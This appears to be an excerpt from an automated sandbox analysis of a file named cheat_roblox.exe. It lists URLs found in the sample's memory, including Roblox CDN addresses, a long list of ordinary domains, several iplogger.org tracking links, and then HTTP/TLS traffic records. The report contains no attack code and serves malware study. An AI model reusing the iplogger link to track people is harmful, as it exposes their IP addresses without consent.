            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807377155.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810615186.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3818007392.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805344321.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804774673.0000000004BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerp
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807377155.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810615186.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3818007392.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805344321.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804774673.0000000004BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayery.
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807377155.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810615186.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3818007392.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805344321.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804774673.0000000004BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/appli
            Source: RobloxPlayerInstaller_2ACC2.log.4.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper
            Source: RobloxPlayerInstaller_2ACC2.log.4.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807377155.0000000004BBD000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805344321.0000000004BBD000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817957870.0000000004BBD000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804774673.0000000004BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperate
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807377155.0000000004BBD000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805344321.0000000004BBD000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817957870.0000000004BBD000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804774673.0000000004BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrappere:0.0ms)p=
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3807377155.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810615186.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3818007392.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805344321.0000000004BEE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3804774673.0000000004BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/applion/PCClientBootstrapper
            Source: sets.json.8.drString found in binary or memory: https://clmbtech.com
            Source: sets.json.8.drString found in binary or memory: https://clubelpais.com.uy
            Source: sets.json.8.drString found in binary or memory: https://cmxd.com.mx
            Source: sets.json.8.drString found in binary or memory: https://cognitive-ai.ru
            Source: sets.json.8.drString found in binary or memory: https://cognitiveai.ru
            Source: sets.json.8.drString found in binary or memory: https://commentcamarche.com
            Source: sets.json.8.drString found in binary or memory: https://commentcamarche.net
            Source: sets.json.8.drString found in binary or memory: https://computerbild.de
            Source: sets.json.8.drString found in binary or memory: https://content-loader.com
            Source: sets.json.8.drString found in binary or memory: https://cookreactor.com
            Source: chromecache_145.11.drString found in binary or memory: https://counter.yadro.ru/hit?
            Source: sets.json.8.drString found in binary or memory: https://cricbuzz.com
            Source: sets.json.8.drString found in binary or memory: https://css-load.com
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
            Source: sets.json.8.drString found in binary or memory: https://deccoria.pl
            Source: sets.json.8.drString found in binary or memory: https://deere.com
            Source: sets.json.8.drString found in binary or memory: https://desimartini.com
            Source: sets.json.8.drString found in binary or memory: https://dewarmsteweek.be
            Source: sets.json.8.drString found in binary or memory: https://economictimes.com
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815554825.000000000285F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809388859.000000000285C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3810473201.000000000285F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecsv2.roblox.com/client/pbe
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchS
            Source: sets.json.8.drString found in binary or memory: https://een.be
            Source: sets.json.8.drString found in binary or memory: https://efront.com
            Source: sets.json.8.drString found in binary or memory: https://eleconomista.net
            Source: sets.json.8.drString found in binary or memory: https://elfinancierocr.com
            Source: sets.json.8.drString found in binary or memory: https://elgrafico.com
            Source: sets.json.8.drString found in binary or memory: https://ella.sv
            Source: sets.json.8.drString found in binary or memory: https://elpais.com.uy
            Source: sets.json.8.drString found in binary or memory: https://elpais.uy
            Source: sets.json.8.drString found in binary or memory: https://etfacademy.it
            Source: sets.json.8.drString found in binary or memory: https://eworkbookcloud.com
            Source: sets.json.8.drString found in binary or memory: https://eworkbookrequest.com
            Source: sets.json.8.drString found in binary or memory: https://fakt.pl
            Source: sets.json.8.drString found in binary or memory: https://finn.no
            Source: sets.json.8.drString found in binary or memory: https://firstlook.biz
            Source: sets.json.8.drString found in binary or memory: https://gallito.com.uy
            Source: sets.json.8.drString found in binary or memory: https://geforcenow.com
            Source: sets.json.8.drString found in binary or memory: https://gettalkdesk.com
            Source: sets.json.8.drString found in binary or memory: https://gliadomain.com
            Source: sets.json.8.drString found in binary or memory: https://gnttv.com
            Source: sets.json.8.drString found in binary or memory: https://grid.id
            Source: sets.json.8.drString found in binary or memory: https://gridgames.app
            Source: sets.json.8.drString found in binary or memory: https://growthrx.in
            Source: sets.json.8.drString found in binary or memory: https://grupolpg.sv
            Source: sets.json.8.drString found in binary or memory: https://gujaratijagran.com
            Source: sets.json.8.drString found in binary or memory: https://hapara.com
            Source: sets.json.8.drString found in binary or memory: https://hazipatika.com
            Source: sets.json.8.drString found in binary or memory: https://hc1.com
            Source: sets.json.8.drString found in binary or memory: https://hc1.global
            Source: sets.json.8.drString found in binary or memory: https://hc1cas.com
            Source: sets.json.8.drString found in binary or memory: https://hc1cas.global
            Source: sets.json.8.drString found in binary or memory: https://healthshots.com
            Source: sets.json.8.drString found in binary or memory: https://hearty.app
            Source: sets.json.8.drString found in binary or memory: https://hearty.gift
            Source: sets.json.8.drString found in binary or memory: https://hearty.me
            Source: sets.json.8.drString found in binary or memory: https://heartymail.com
            Source: sets.json.8.drString found in binary or memory: https://helpdesk.com
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2129059301.0000000002899000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127732650.0000000002093000.00000002.00000001.01000000.00000009.sdmp, cacert.pem.4.drString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/cert
            Source: sets.json.8.drString found in binary or memory: https://hindustantimes.com
            Source: sets.json.8.drString found in binary or memory: https://hj.rs
            Source: sets.json.8.drString found in binary or memory: https://hjck.com
            Source: sets.json.8.drString found in binary or memory: https://html-load.cc
            Source: sets.json.8.drString found in binary or memory: https://html-load.com
            Source: sets.json.8.drString found in binary or memory: https://human-talk.org
            Source: sets.json.8.drString found in binary or memory: https://idbs-cloud.com
            Source: sets.json.8.drString found in binary or memory: https://idbs-dev.com
            Source: sets.json.8.drString found in binary or memory: https://idbs-eworkbook.com
            Source: sets.json.8.drString found in binary or memory: https://idbs-staging.com
            Source: sets.json.8.drString found in binary or memory: https://img-load.com
            Source: sets.json.8.drString found in binary or memory: https://indiatimes.com
            Source: sets.json.8.drString found in binary or memory: https://indiatoday.in
            Source: sets.json.8.drString found in binary or memory: https://indiatodayne.in
            Source: sets.json.8.drString found in binary or memory: https://infoedgeindia.com
            Source: sets.json.8.drString found in binary or memory: https://interia.pl
            Source: sets.json.8.drString found in binary or memory: https://intoday.in
            Source: sets.json.8.drString found in binary or memory: https://iolam.it
            Source: chromecache_145.11.drString found in binary or memory: https://iplogger.org/
            Source: chromecache_145.11.drString found in binary or memory: https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f83229
            Source: chromecache_145.11.drString found in binary or memory: https://iplogger.org/privacy/
            Source: chromecache_145.11.drString found in binary or memory: https://iplogger.org/rules/
            Source: sets.json.8.drString found in binary or memory: https://ishares.com
            Source: sets.json.8.drString found in binary or memory: https://jagran.com
            Source: sets.json.8.drString found in binary or memory: https://johndeere.com
            Source: sets.json.8.drString found in binary or memory: https://journaldesfemmes.com
            Source: sets.json.8.drString found in binary or memory: https://journaldesfemmes.fr
            Source: sets.json.8.drString found in binary or memory: https://journaldunet.com
            Source: sets.json.8.drString found in binary or memory: https://journaldunet.fr
            Source: sets.json.8.drString found in binary or memory: https://joyreactor.cc
            Source: sets.json.8.drString found in binary or memory: https://joyreactor.com
            Source: sets.json.8.drString found in binary or memory: https://kaksya.in
            Source: sets.json.8.drString found in binary or memory: https://knowledgebase.com
            Source: sets.json.8.drString found in binary or memory: https://kompas.com
            Source: sets.json.8.drString found in binary or memory: https://kompas.tv
            Source: sets.json.8.drString found in binary or memory: https://kompasiana.com
            Source: sets.json.8.drString found in binary or memory: https://lanacion.com.ar
            Source: sets.json.8.drString found in binary or memory: https://landyrev.com
            Source: sets.json.8.drString found in binary or memory: https://landyrev.ru
            Source: sets.json.8.drString found in binary or memory: https://laprensagrafica.com
            Source: sets.json.8.drString found in binary or memory: https://lateja.cr
            Source: sets.json.8.drString found in binary or memory: https://libero.it
            Source: sets.json.8.drString found in binary or memory: https://linternaute.com
            Source: sets.json.8.drString found in binary or memory: https://linternaute.fr
            Source: sets.json.8.drString found in binary or memory: https://livechat.com
            Source: sets.json.8.drString found in binary or memory: https://livechatinc.com
            Source: sets.json.8.drString found in binary or memory: https://livehindustan.com
            Source: sets.json.8.drString found in binary or memory: https://livemint.com
            Source: sets.json.8.drString found in binary or memory: https://max.auto
            Source: sets.json.8.drString found in binary or memory: https://medonet.pl
            Source: sets.json.8.drString found in binary or memory: https://meo.pt
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.cl
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.co.cr
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.ar
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.bo
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.co
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.do
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.ec
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.gt
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.hn
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.mx
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.ni
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.pa
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.pe
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.py
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.sv
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.uy
            Source: sets.json.8.drString found in binary or memory: https://mercadolibre.com.ve
            Source: sets.json.8.drString found in binary or memory: https://mercadolivre.com
            Source: sets.json.8.drString found in binary or memory: https://mercadolivre.com.br
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.cl
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.ar
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.br
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.co
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.ec
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.mx
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.pe
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.uy
            Source: sets.json.8.drString found in binary or memory: https://mercadopago.com.ve
            Source: sets.json.8.drString found in binary or memory: https://mercadoshops.cl
            Source: sets.json.8.drString found in binary or memory: https://mercadoshops.com
            Source: sets.json.8.drString found in binary or memory: https://mercadoshops.com.ar
            Source: sets.json.8.drString found in binary or memory: https://mercadoshops.com.br
            Source: sets.json.8.drString found in binary or memory: https://mercadoshops.com.co
            Source: sets.json.8.drString found in binary or memory: https://mercadoshops.com.mx
            Source: sets.json.8.drString found in binary or memory: https://mighty-app.appspot.com
            Source: sets.json.8.drString found in binary or memory: https://mightytext.net
            Source: sets.json.8.drString found in binary or memory: https://mittanbud.no
            Source: sets.json.8.drString found in binary or memory: https://money.pl
            Source: sets.json.8.drString found in binary or memory: https://mystudentdashboard.com
            Source: sets.json.8.drString found in binary or memory: https://nacion.com
            Source: sets.json.8.drString found in binary or memory: https://naukri.com
            Source: sets.json.8.drString found in binary or memory: https://nidhiacademyonline.com
            Source: sets.json.8.drString found in binary or memory: https://nien.co
            Source: sets.json.8.drString found in binary or memory: https://nien.com
            Source: sets.json.8.drString found in binary or memory: https://nien.org
            Source: sets.json.8.drString found in binary or memory: https://nlc.hu
            Source: sets.json.8.drString found in binary or memory: https://nosalty.hu
            Source: sets.json.8.drString found in binary or memory: https://noticiascaracol.com
            Source: sets.json.8.drString found in binary or memory: https://nourishingpursuits.com
            Source: sets.json.8.drString found in binary or memory: https://nvidia.com
            Source: sets.json.8.drString found in binary or memory: https://o2.pl
            Source: sets.json.8.drString found in binary or memory: https://ocdn.eu
            Source: sets.json.8.drString found in binary or memory: https://onet.pl
            Source: sets.json.8.drString found in binary or memory: https://ottplay.com
            Source: sets.json.8.drString found in binary or memory: https://p106.net
            Source: sets.json.8.drString found in binary or memory: https://p24.hu
            Source: sets.json.8.drString found in binary or memory: https://paula.com.uy
            Source: sets.json.8.drString found in binary or memory: https://pdmp-apis.no
            Source: sets.json.8.drString found in binary or memory: https://phonandroid.com
            Source: sets.json.8.drString found in binary or memory: https://player.pl
            Source: sets.json.8.drString found in binary or memory: https://plejada.pl
            Source: sets.json.8.drString found in binary or memory: https://poalim.site
            Source: sets.json.8.drString found in binary or memory: https://poalim.xyz
            Source: sets.json.8.drString found in binary or memory: https://pomponik.pl
            Source: sets.json.8.drString found in binary or memory: https://portalinmobiliario.com
            Source: sets.json.8.drString found in binary or memory: https://prisjakt.no
            Source: sets.json.8.drString found in binary or memory: https://pudelek.pl
            Source: sets.json.8.drString found in binary or memory: https://punjabijagran.com
            Source: sets.json.8.drString found in binary or memory: https://radio1.be
            Source: sets.json.8.drString found in binary or memory: https://radio2.be
            Source: sets.json.8.drString found in binary or memory: https://reactor.cc
            Source: sets.json.8.drString found in binary or memory: https://repid.org
            Source: sets.json.8.drString found in binary or memory: https://reshim.org
            Source: sets.json.8.drString found in binary or memory: https://rws1nvtvt.com
            Source: sets.json.8.drString found in binary or memory: https://rws2nvtvt.com
            Source: sets.json.8.drString found in binary or memory: https://rws3nvtvt.com
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://s3.amazonaws.com/
            Source: sets.json.8.drString found in binary or memory: https://sackrace.ai
            Source: sets.json.8.drString found in binary or memory: https://salemoveadvisor.com
            Source: sets.json.8.drString found in binary or memory: https://salemovefinancial.com
            Source: sets.json.8.drString found in binary or memory: https://salemovetravel.com
            Source: sets.json.8.drString found in binary or memory: https://samayam.com
            Source: sets.json.8.drString found in binary or memory: https://sapo.io
            Source: sets.json.8.drString found in binary or memory: https://sapo.pt
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3809388859.000000000285C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3809503208.0000000002869000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3815775237.000000000286C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.comwI&
            Source: sets.json.8.drString found in binary or memory: https://shock.co
            Source: sets.json.8.drString found in binary or memory: https://smaker.pl
            Source: sets.json.8.drString found in binary or memory: https://smoney.vn
            Source: sets.json.8.drString found in binary or memory: https://smpn106jkt.sch.id
            Source: sets.json.8.drString found in binary or memory: https://socket-to-me.vip
            Source: sets.json.8.drString found in binary or memory: https://songshare.com
            Source: sets.json.8.drString found in binary or memory: https://songstats.com
            Source: sets.json.8.drString found in binary or memory: https://sporza.be
            Source: sets.json.8.drString found in binary or memory: https://standardsandpraiserepurpose.com
            Source: sets.json.8.drString found in binary or memory: https://startlap.hu
            Source: sets.json.8.drString found in binary or memory: https://startupislandtaiwan.com
            Source: sets.json.8.drString found in binary or memory: https://startupislandtaiwan.net
            Source: sets.json.8.drString found in binary or memory: https://startupislandtaiwan.org
            Source: sets.json.8.drString found in binary or memory: https://stripe.com
            Source: sets.json.8.drString found in binary or memory: https://stripe.network
            Source: sets.json.8.drString found in binary or memory: https://stripecdn.com
            Source: sets.json.8.drString found in binary or memory: https://supereva.it
            Source: sets.json.8.drString found in binary or memory: https://talkdeskqaid.com
            Source: sets.json.8.drString found in binary or memory: https://talkdeskstgid.com
            Source: sets.json.8.drString found in binary or memory: https://teacherdashboard.com
            Source: sets.json.8.drString found in binary or memory: https://technology-revealed.com
            Source: sets.json.8.drString found in binary or memory: https://terazgotuje.pl
            Source: sets.json.8.drString found in binary or memory: https://text.com
            Source: sets.json.8.drString found in binary or memory: https://textyserver.appspot.com
            Source: sets.json.8.drString found in binary or memory: https://the42.ie
            Source: sets.json.8.drString found in binary or memory: https://thejournal.ie
            Source: sets.json.8.drString found in binary or memory: https://thirdspace.org.au
            Source: sets.json.8.drString found in binary or memory: https://timesinternet.in
            Source: sets.json.8.drString found in binary or memory: https://timesofindia.com
            Source: sets.json.8.drString found in binary or memory: https://tolteck.app
            Source: sets.json.8.drString found in binary or memory: https://tolteck.com
            Source: sets.json.8.drString found in binary or memory: https://top.pl
            Source: sets.json.8.drString found in binary or memory: https://tribunnews.com
            Source: sets.json.8.drString found in binary or memory: https://trytalkdesk.com
            Source: sets.json.8.drString found in binary or memory: https://tucarro.com
            Source: sets.json.8.drString found in binary or memory: https://tucarro.com.co
            Source: sets.json.8.drString found in binary or memory: https://tucarro.com.ve
            Source: sets.json.8.drString found in binary or memory: https://tvid.in
            Source: sets.json.8.drString found in binary or memory: https://tvn.pl
            Source: sets.json.8.drString found in binary or memory: https://tvn24.pl
            Source: sets.json.8.drString found in binary or memory: https://unotv.com
            Source: sets.json.8.drString found in binary or memory: https://victorymedium.com
            Source: sets.json.8.drString found in binary or memory: https://vrt.be
            Source: sets.json.8.drString found in binary or memory: https://vwo.com
            Source: sets.json.8.drString found in binary or memory: https://welt.de
            Source: sets.json.8.drString found in binary or memory: https://wieistmeineip.de
            Source: sets.json.8.drString found in binary or memory: https://wildix.com
            Source: sets.json.8.drString found in binary or memory: https://wildixin.com
            Source: sets.json.8.drString found in binary or memory: https://wingify.com
            Source: sets.json.8.drString found in binary or memory: https://wordle.at
            Source: sets.json.8.drString found in binary or memory: https://wp.pl
            Source: sets.json.8.drString found in binary or memory: https://wpext.pl
            Source: sets.json.8.drString found in binary or memory: https://www.asadcdn.com
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3810149194.0000000004B73000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806474802.0000000004B6C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805832036.0000000004B57000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3806735943.0000000004B6F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817719825.0000000004B73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3805926753.0000000004B85000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3805686454.0000000004B82000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3817824110.0000000004B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: sets.json.8.drString found in binary or memory: https://ya.ru
            Source: sets.json.8.drString found in binary or memory: https://zalo.me
            Source: sets.json.8.drString found in binary or memory: https://zdrowietvn.pl
            Source: sets.json.8.drString found in binary or memory: https://zingmp3.vn
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 58804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58795
            Source: unknownNetwork traffic detected: HTTP traffic on port 58795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58797
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 58801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.6:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.6:49749 version: TLS 1.2
